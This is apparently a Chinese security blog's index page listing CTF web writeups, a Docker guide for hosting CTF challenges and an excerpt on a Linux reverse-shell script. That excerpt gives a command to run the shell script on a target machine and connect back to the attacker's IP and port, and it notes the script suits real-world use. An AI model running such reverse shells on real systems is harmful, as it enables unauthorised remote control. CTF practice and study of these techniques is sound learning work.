LiM
10
28
Roarctf Web writeup Roarctf Web writeup
#写在前面,很多知识都不会,但在慢慢学习过程中积累,下面记录一下Roarctf web 题解,学习一手新知识 easy_calc看了一下页面可以计算式子,猜测后台是eval函数,看了下网络看经过哪些请求,发现请求了一个请求网址calc.ph
2019-10-28 LiM
26
Syc Geek 10th web部分题解 Syc Geek 10th web部分题解
打比赛先撸一只猫查看源码,发现简单考点 <!-- $cat=$_GET['cat']; echo $cat; if($cat=='dog'){ echo 'Syc{cat_cat_cat_cat}'; } --> 只需GET传参cat
2019-10-26 LiM
26
docker简单学习及简单部署CTF题 docker简单学习及简单部署CTF题
1.什么是docker: Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中,然后发布到任何流行的Linux或Windows机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口
2019-10-26 LiM
21
linux反弹shell脚本的分析 linux反弹shell脚本的分析
linux的反弹shell脚本,实战,awd都可使用,代码来自原Google安全团队,在目标机运行下面python代码,nohup python shell.py (your ip) (your port) & 在vps进行监听,n
2019-10-21 LiM